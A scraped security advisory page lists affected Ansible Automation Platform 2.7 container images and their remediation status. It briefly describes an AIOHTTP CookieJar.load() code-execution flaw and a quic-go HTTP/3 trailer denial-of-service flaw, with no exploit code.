| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in AIOHTTP, an asynchronous HTTP client/server framework for asyncio and Python. An attacker could exploit this vulnerability by providing untrusted input to the `CookieJar.load()` function. This could potentially lead to arbitrary code execution, allowing the attacker to run malicious code on the affected system. This issue is most likely to occur in applications that allow attacker-controlled files to be loaded.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in quic-go, an implementation of the QUIC protocol in Go. A remote attacker can exploit this by sending specially crafted HTTP/3 trailer fields. This can cause the system to allocate excessive memory, leading to a denial-of-service (DoS) condition where the affected server or client may crash or run out of resources.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Workaround
|
|
